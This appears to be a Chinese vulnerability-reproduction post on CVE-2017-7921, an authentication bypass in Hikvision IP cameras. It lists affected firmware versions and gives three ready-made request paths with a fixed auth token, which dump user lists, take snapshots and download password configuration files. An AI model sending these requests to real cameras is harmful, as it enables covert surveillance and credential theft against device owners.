CVE-2017-7921漏洞复现

作者-Beginner

0x01 CVE-2017-7921漏洞复现

许多HikvisionIP摄像机包含一个后门，允许未经身份验证的模拟任何配置的用户帐户。

0x02 漏洞复现：

利用Goby发现漏洞（CVE-2017-7921）：

利用路径：/Security/users?auth=YWRtaW46MTEK

附：检索所有用户及其角色的列表

利用路径：/onvif-http/snapshot?auth=YWRtaW46MTEK

附：获取相机快照而不进行身份验证

利用路径：

/System/configurationFile?auth=YWRtaW46MTEK

附：下载摄像头配置账号密码文件

0x03 漏洞影响版本：

HikvisionDS-2CD2xx2F-ISeries5.2.0build140721

版本至5.4.0build160530版本；

DS-2CD2xx0F-ISeries5.2.0build140721

版本至5.4.0Build160401版本；

DS-2CD2xx2FWDSeries5.3.1build150410

版本至5.4.4Build161125版本；

DS-2CD4x2xFWDSeries5.2.0build140721

版本至5.4.0Build160414版本；

DS-2CD4xx5Series5.2.0build140721

版本至5.4.0Build160421版本；

DS-2DFxSeries5.2.0build140805

版本至5.4.5Build160928版本；

DS-2CD63xxSeries5.0.9build140305

版本至5.3.5Build160106版本

0x04 参考链接：

https://packetstormsecurity.com/files/144097/Hikvision-IP-Camera-Access-Bypass.html

https://www.seebug.org/vuldb/ssvid-96469